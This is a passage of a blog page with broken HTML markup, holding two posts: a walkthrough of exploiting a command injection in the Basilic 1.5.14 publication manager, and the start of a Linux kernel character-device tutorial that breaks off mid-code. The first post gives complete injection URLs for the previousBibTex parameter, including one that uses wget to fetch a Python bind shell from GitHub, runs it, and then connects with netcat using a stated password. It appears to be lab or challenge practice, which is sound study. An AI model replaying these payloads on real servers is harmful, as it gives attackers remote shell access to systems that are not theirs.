class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spanmysql -u root -p/span span class="code-line"span class="go"Enter password: /span/span span class="code-line"span class="go"Welcome to the MySQL monitor. Commands end with ; or \g./span/span span class="code-line"span class="go"Your MySQL connection id is 102/span/span span class="code-line"span class="go"Server version: 5.5.37-0+wheezy1 (Debian)/span/span span class="code-line"/span span class="code-line"span class="go"Copyright (c) 2000, 2014, Oracle and/or its affiliates. All rights reserved./span/span span class="code-line"/span span class="code-line"span class="go"Oracle is a registered trademark of Oracle Corporation and/or its/span/span span class="code-line"span class="go"affiliates. Other names may be trademarks of their respective/span/span span class="code-line"span class="go"owners./span/span span class="code-line"/span span class="code-line"span class="go"Type #39;help;#39; or #39;\h#39; for help. Type #39;\c#39; to clear the current input statement./span/span span class="code-line"/span span class="code-line"span class="go"mysqlgt; \u basilic/span/span span class="code-line"span class="go"Reading table information for completion of table and column names/span/span span class="code-line"span class="go"You can turn off this feature to get a quicker startup with -A/span/span span class="code-line"/span span class="code-line"span class="go"Database changed/span/span span class="code-line"span class="go"mysqlgt; show create table publis;/span/span span class="code-line"span class="go"+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+/span/span span class="code-line"span class="go"| Table | Create Table |/span/span span class="code-line"span class="go"+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+/span/span span class="code-line"span class="go"| publis | CREATE TABLE `publis` (/span/span span class="code-line"span class="go" `id` smallint(5) unsigned NOT NULL AUTO_INCREMENT,/span/span span class="code-line"span class="go" `bibTex` varchar(20) NOT NULL DEFAULT #39;#39;,/span/span span class="code-line"span class="go" `entry` enum(#39;Article#39;,#39;InProceedings#39;,#39;InBook#39;,#39;Book#39;,#39;PhdThesis#39;,#39;MastersThesis#39;,#39;TechReport#39;,#39;Misc#39;,#39;Booklet#39;,#39;InCollection#39;,#39;Manual#39;,#39;Proceedings#39;,#39;Unpublished#39;) NOT NULL DEFAULT #39;Article#39;,/span/span span class="code-line"span class="go" `address` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `booktitle` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `chapter` varchar(30) DEFAULT NULL,/span/span span class="code-line"span class="go" `edition` varchar(50) DEFAULT NULL,/span/span span class="code-line"span class="go" `editor` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `howpublished` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `institution` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `journal` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `keywords` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `month` varchar(30) DEFAULT NULL,/span/span span class="code-line"span class="go" `note` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `number` varchar(10) DEFAULT NULL,/span/span span class="code-line"span class="go" `optkey` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `organization` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `pages` varchar(15) DEFAULT NULL,/span/span span class="code-line"span class="go" `publisher` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `school` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `series` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `title` varchar(255) NOT NULL DEFAULT #39;#39;,/span/span span class="code-line"span class="go" `type` varchar(255) DEFAULT NULL,/span/span span class="code-line"span class="go" `volume` varchar(20) DEFAULT NULL,/span/span span class="code-line"span class="go" `year` year(4) NOT NULL DEFAULT #39;0000#39;,/span/span span class="code-line"span class="go" PRIMARY KEY (`id`),/span/span span class="code-line"span class="go" UNIQUE KEY `bibTex` (`bibTex`)/span/span span class="code-line"span class="go") ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1 |/span/span span class="code-line"span class="go"+--------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+/span/span span class="code-line"span class="go"1 row in set (0.00 sec)/span/span span class="code-line"/code/pre/div /td/tr/table pTime to figure out how we insert data into this table./p pYou can add a publication on the publications page (codehttp://dev/basilic-1.5.14/Intranet/Publications//code). It first asks you what type of publication you want to create, I pick anything here. Before you can add a publication you will need to create an author./p pAlso before you can create a publication, you need to create a codePublications/code directory in the web root and give the web user permissions to write to it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spanmkdir ../Publications/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14# /spanchown -R www-data:www-data ../Publications/span span class="code-line"/code/pre/div /td/tr/table pAfter the author is added and the codePublications/code directory is created you can fill out the form with dummy data. Before I send it I put a single quote (code'/code) in one of the fields so that the query breaks:/p pimg src="/assets/images/web-hacking/basilic-found-sqli2.png" width="750" height="500"/p pThis is the request that was sent to get this error:/p pimg src="/assets/images/web-hacking/basilic-found-sqli2-req.png" width="750"/p pAs you can see, we don't seem to have any control over the codebibTex/code field, but we do control the codeentry/code field (here we have sent codeArticle/code) which in the query is just before the codebibTex/code field./p pUsing this knowledge we can insert a command here and look for where we can run it:/p pimg src="/assets/images/web-hacking/basilic-test-sqli2.png" width="750"/p pTo test this command injection we need to run one of those scripts, if you remember the name of the file was codeupdatePubliDocs.php/code so we can assume that it was something to do with updating, when you try to edit the publication, there is an update button:/p pimg src="/assets/images/web-hacking/basilic-publication-edit.png" width="750"/p pAfter you fill in a codetitle/code and click codeupdate/code you should have the following screen:/p pimg src="/assets/images/web-hacking/basilic-publication-edit2.png" width="750"/p pAnd checking the code/tmp/code directory, we can see that it has in fact worked:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spanls -l /tmp//span span class="code-line"span class="go"total 44/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 30620 Jun 3 15:11 basilic-log.txt/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 11857 Jun 3 12:42 basilic.original/span/span span class="code-line"span class="go"-rw-rw-rw- 1 www-data www-data 0 Jun 3 15:11 test.txt/span/span span class="code-line"/code/pre/div /td/tr/table h2Developing The Exploit/h2 pNow that we have confirmed a command injection it is time to start developing the exploit./p pThe request that we sent to run the command was this:/p pimg src="/assets/images/web-hacking/basilic-test-cmdi2-req.png" width="750"/p pAs we can see, we control the codepreviousBibTex/code field so we might not be limited to 20 characters and we might not need to insert the data into the database first, let's test that we can do this, put the following as the URL:/p pcodehttp://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=updateamp;authorList=2amp;previousBibTex=%3Btouch+%2Ftmp%2Fthis-is-a-ridiculously-long-file-name-more-than-20-characters.txtamp;previousYear=0000amp;id=2amp;entry=Articleamp;name=amp;title=1amp;year=2015amp;selectFill=amp;journal=2amp;volume=amp;number=amp;pages=amp;month=amp;optkey=amp;keywords=amp;note=/code/p pThis is the same as the actual request execpt we are trying to run the command codetouch /tmp/this-is-a-ridiculously-long-file-name-more-than-20-characters.txt/code instead of codetouch /tmp/test.txt/code:/p pimg src="/assets/images/web-hacking/basilic-test-cmdi3.png" width="750"/p pAnd checking the code/tmp/code directory again:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:/var/www/basilic-1.5.14# /spanls -l /tmp//span span class="code-line"span class="go"total 44/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 32400 Jun 3 15:33 basilic-log.txt/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 11857 Jun 3 12:42 basilic.original/span/span span class="code-line"span class="go"-rw-rw-rw- 1 www-data www-data 0 Jun 3 15:13 test.txt/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 0 Jun 3 15:33 this-is-a-ridiculously-long-file-name-more-than-20-characters.txt/span/span span class="code-line"/code/pre/div /td/tr/table pSo now we aren't limited to 20 characters any more and we only need to make 1 request per command./p pWe need to check for a few tools on the system to see how we can get command line access, so browse to the following URL:/p pcodehttp://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=updateamp;authorList=2amp;previousBibTex=%3Bnc%20-h%202gt;%20%2Fvar%2Fwww%2Ftools.txt%3Bpython%20-V%202gt;gt;%20%2Fvar%2Fwww%2Ftools.txt%3Bamp;previousYear=0000amp;id=2amp;entry=Articleamp;name=amp;title=1amp;year=2015amp;selectFill=amp;journal=2amp;volume=amp;number=amp;pages=amp;month=amp;optkey=amp;keywords=amp;note=/code/p pHere we are running the following code;nc -h 2gt; /var/www/tools.txt;python -V 2gt;gt; /var/www/tools.txt;/code, each command is separated by a semicolon code;/code./p pAnd then browse to codehttp://dev/tools.txt/code. You should see something like this:/p pimg src="/assets/images/web-hacking/basilic-cmdi-tools.png" width="750"/p pAs you can see, we have both a href="http://netcat.sourceforge.net/"netcat/a and a href="https://www.python.org/"python/a 2.7.3 installed. As the actual server is running Ubuntu and Ubuntu's version of netcat doesn't have the code-e/code option I'll use python here./p pThis URL will download a python bind shell that we can connect to and then run it:/p pcodehttp://dev/basilic-1.5.14/Intranet/Publications/publiAction.php?act=updateamp;authorList=2amp;previousBibTex=%3Bwget%20-O%20%2Ftmp%2Fbind.py%20https://raw.githubusercontent.com/s7ephen/Tamatebako/master/bindshell.py%3Bpython%20%2Ftmp%2Fbind.py%3Bamp;previousYear=0000amp;id=2amp;entry=Articleamp;name=amp;title=1amp;year=2015amp;selectFill=amp;journal=2amp;volume=amp;number=amp;pages=amp;month=amp;optkey=amp;keywords=amp;note=/code/p pThis is running code;wget -O /tmp/bind.py https://raw.githubusercontent.com/s7ephen/Tamatebako/master/bindshell.py;python /tmp/bind.py;/code to download the bind shell with a href="https://www.gnu.org/software/wget/" target="_blank"wget/a, saving it to code/tmp/bind.py/code and running it with the python interpreter./p pThis bind shell listens on port 2400 and has the password codemtso/code. Thanks to codes7ephen/code for the bind shell, here is a href="http://dontstuffbeansupyournose.com/" target="_blank"his website/a./p pAfter the request is sent we can use netcat to connect to it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~$ /spannc dev span class="m"2400/span/span span class="code-line"span class="go"[8731] bindshell on port 2400/span/span span class="code-line"span class="go"password? mtso/span/span span class="code-line"span class="gp"[email protected]:/var/www/basilic-1.5.14/Intranet/Publications$ /spanls -l/span span class="code-line"span class="go"ls -l/span/span span class="code-line"span class="go"total 44/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 227 Jun 3 12:42 index.html/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 2549 Jun 3 12:42 menuPubli.php/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 17212 Jun 3 12:42 publi.php/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 8836 Jun 3 12:42 publiAction.php/span/span span class="code-line"span class="go"-rw-r--r-- 1 www-data www-data 2529 Jun 3 12:42 updatePublis.php/span/span span class="code-line"/code/pre/div /td/tr/table pRunning this as is (just changing the host part of the URL) against the target machine works perfectly./p h2Conclusion/h2 pThis application was one of the most poorly written applications I've ever seen. There are vulnerabilities at every turn and no attempt seems to have been made to fix them./p pI would advise against using this application anywhere except for testing your pentesting skills./p pLastly I'd like to add that the command injection vulnerability I found isn't actually in the codeupdatePubliDocs.php/code file or even in a call to the codesystem/code PHP function. So as well as looking for where the vulnerability I found actually was (Hint: its in a call to the codeexec/code PHP function) there is still probably another command injection vulnerability in the calls to codesystem/code./p pThis was a fun challenge./p pHappy Hacking :-)/p

A Simple Character Device

6 June 2014 at 13:55
By: 0xe7
pThis is the second post on a href="https://en.wikipedia.org/wiki/Linux" target="_blank"Linux/a a href="https://en.wikipedia.org/wiki/Kernel_%28computing%29" target="_blank"kernel/a hacking. In the a href="/linux-kernel-hacking/2014/05/10/first-lkm/"first post/a we created a basic Linux a href="https://en.wikipedia.org/wiki/Loadable_kernel_module" target="_blank"kernel module/a, but this LKM didn't really do anything except write a message to the system log on load/unload./p pNow we will extend this to create a device which we can use to communicate with the LKM, other than a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system calls/a, a href="https://en.wikipedia.org/wiki/Device_file" target="_blank"device files/a are how a href="https://en.wikipedia.org/wiki/User_space" target="_blank"userland/a applications communicate with code running in a href="https://en.wikipedia.org/wiki/User_space#Kernel_space" target="_blank"kernelland/a./p !-- more -- h2What Is A Device File/h2 pThere are 2 main types of device files, a a href="https://en.wikipedia.org/wiki/Device_file#Character_devices" target="_blank"character device/a file and a a href="https://en.wikipedia.org/wiki/Device_file#Block_devices" target="_blank"block device/a file. The differences are, a block device is buffered (meaning it doesn't offer direct access to the device and ultimately means that you don't know how long it will take before a write is pushed to the actual device) and a block device allows reads or writes of any size, character device reads and writes are aligned to block boundaries./p pWe will be using a character device because they are simpler to understand (as we will use the device file in exactly the same way that we would use a regular file), we have no need for random access to the device and it provides direct access to the device./p pWhen viewed using codels -l/code a character device will have codec/code as the first letter, while a block device has a codeb/code./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~# /spanls -l /dev/console/span span class="code-line"span class="go"crw------- 1 root root 5, 1 May 29 12:07 /dev/console/span/span span class="code-line"span class="gp"[email protected]:~# /spanstat /dev/console/span span class="code-line"span class="go" File: `/dev/console#39;/span/span span class="code-line"span class="go" Size: 0 Blocks: 0 IO Block: 4096 character special file/span/span span class="code-line"span class="go"Device: 5h/5d Inode: 1466 Links: 1 Device type: 5,1/span/span span class="code-line"span class="go"Access: (0600/crw-------) Uid: ( 0/ root) Gid: ( 0/ root)/span/span span class="code-line"span class="go"Access: 2014-05-29 12:06:54.303999993 +0100/span/span span class="code-line"span class="go"Modify: 2014-05-29 12:07:28.303999993 +0100/span/span span class="code-line"span class="go"Change: 2014-05-29 12:06:54.303999993 +0100/span/span span class="code-line"span class="go" Birth: -/span/span span class="code-line"/code/pre/div /td/tr/table pFirst on line 1 I use codels/code to view some of the attributes of the file, as you can see on line 2 it is a character device. On line 3 I use the codestat/code command to view further statistics, here, on line 6, it tells you the major and minor numbers (5 and 1 respectively, these numbers are also shown in the output of codels/code after the group ownership), a href="https://en.wikipedia.org/wiki/Inode" target="_blank"inode/a number and a href="https://en.wikipedia.org/wiki/Block_%28data_storage%29" target="_blank"block/a size (on line 5)./p pThis means that if you delete the file with coderm /dev/console/code, you can create the file again using codemknod /dev/console c 5 1/code (codec/code is for character device). I will demonstrate this later with our custom character device./p pThe major and minor numbers uniquely identify a device. The major number defines which driver is going to be called to perform the input/output operation. The minor number is implementation defined, basically its up to the driver what the minor number means, it is just passed as an argument./p h2Building Our Character Device/h2 pFor our character device we will implement a basic device which will take a string as an input (when the device file is written to), reverse the words of the string (any string of characters without a space is considered a word here) and output the reversed string when the device file is read from./p pIn Linux there is a generic character device called codemisc/code implemented in the kernel, this is the device we will use to create our character device./p pThe advantage here is that the codemisc/code device deals with the initialisation and cleanup of the device so we can just concentrate on the functionality of it. The major number of the codemisc/code device is 10, we can confirm this later once we have created ours and is codedrivers/char/misc.c/code in the kernel source./p pEvery device requires a file_operations a href="https://en.wikipedia.org/wiki/Struct_%28C_programming_language%29" target="_blank"struct/a, this defines what functions are run when certain actions are performed on the devices file, it is defined in codeincludes/linux/fs.h/code (so we will need to include this header file) as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="k"struct/span span class="nc"file_operations/spanspan class="w" /spanspan class="n"__fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"owner/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"THIS_MODULE/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"open/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"__fops/spanspan class="w" /spanspan class="err"##/spanspan class="w" /spanspan class="n"_open/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"release/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_release/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"read/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_read/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"write/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"simple_attr_write/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"llseek/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"generic_file_llseek/spanspan class="p",/spanspan class="w" /span\/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pYou don't need to use all of these, only the ones that you will require based on what you want to do with your device. We only want to do something particular when we read from or write to the device file so our file_operations struct will be like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/span span class="nc"file_operations/spanspan class="w" /spanspan class="n"reverse_fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"read/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_read/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"write/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_write/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAll of the functions will contain the name codereverse/code which is what our character device will be called due to the nature of what it does, although the actual names are irrelevant./p pHere we are telling the kernel that when a read happens on our device file we want to run the function codereverse_read/code (on line 2) and when a write happens we want to run the function codereverse_write/code (on line 3)./p pWe will use this struct inside our codemiscdevice/code struct. The codemiscdevice/code struct is defined in codeinclude/linux/miscdevice.h/code (so we will also need to include this header file) as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"minor/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"name/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="k"struct/span span class="nc"file_operations/spanspan class="w" /spanspan class="o"*/spanspan class="n"fops/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"list_head/spanspan class="w" /spanspan class="n"list/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"device/spanspan class="w" /spanspan class="o"*/spanspan class="n"parent/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"struct/span span class="nc"device/spanspan class="w" /spanspan class="o"*/spanspan class="n"this_device/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"nodename/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"umode_t/spanspan class="w" /spanspan class="n"mode/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pAgain, here we only need codeminor/code, codename/code and codefops/code. So ours will be defined as:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="n"reverse_misc_device/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"minor/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"MISC_DYNAMIC_MINOR/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"name/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;reversequot;/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"reverse_fops/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pIn the codeinclude/linux/miscdevice.h/code header, the a href="http://www.cprogrammingexpert.com/C/Tutorial/fundamentals/symbolic_constant_c_programming_language.aspx" target="_blank"symbolic constant/a codeMISC_DYNAMIC_MINOR/code is defined as code255/code, this means it will pick the next avaliable minor number./p pNow we should ensure our device is registered and unregistered when our LKM is loaded and unloaded respectively. The codeinclude/linux/miscdevice.h/code header also includes the declaration of 2 functions that will help us here, codemisc_register/code and codemisc_deregister/code, and they are decleared as follows:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"extern/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"misc_register/spanspan class="p"(/spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="o"*/spanspan class="w" /spanspan class="n"misc/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="k"extern/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="nf"misc_deregister/spanspan class="p"(/spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="o"*/spanspan class="n"misc/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pSo they both take 1 argument, the miscdevice struct created earlier. Other than this our LKM doesn't need to do anything else, so the initialization and exit functions can be written like this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"reverse_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_register/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"reverse_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_deregister/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pNext we need to develop the functionality, for this I wrote a normal a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a application to make sure it was all working:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span 